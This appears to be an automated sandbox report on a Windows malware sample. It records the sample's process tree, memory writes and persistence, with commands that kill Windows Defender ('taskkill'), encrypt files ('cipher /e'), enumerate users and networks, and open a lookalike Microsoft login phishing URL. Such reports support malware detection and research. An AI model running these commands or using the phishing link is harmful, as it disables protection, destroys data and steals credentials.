Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1656 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3552 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3552 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4816 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 60 wrote to memory of 3528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 60 wrote to memory of 3528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 60 wrote to memory of 3528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 4816 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 60 wrote to memory of 756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 756 wrote to memory of 3364 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 756 wrote to memory of 3364 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 756 wrote to memory of 3364 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4816 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 60 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 696 wrote to memory of 3360 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 3360 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 3360 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 60 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 60 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 60 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3552 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3552 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3552 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3552 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3552 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 3428 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 3428 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3552 wrote to memory of 4300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
PID 3552 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
PID 3552 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
PID 3552 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3552 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 1556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 1556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\vir.exe

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K spread.cmd

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K doxx.cmd

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy 1 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\ipconfig.exe

ipconfig

C:\Windows\SysWOW64\xcopy.exe

xcopy 2 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\net.exe

net accounts

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts

C:\Windows\SysWOW64\xcopy.exe

xcopy 3 C:\Users\Admin\

C:\Windows\SysWOW64\net.exe

net user

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user

C:\Windows\SysWOW64\tasklist.exe

tasklist /apps /v /fo table

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im WindowsDefender.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K handler.cmd

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K cipher.cmd

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe

Rover.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web.htm

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Google.exe

Google.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,9935317460879055041,7039101043739041263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\helper.vbs"

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1

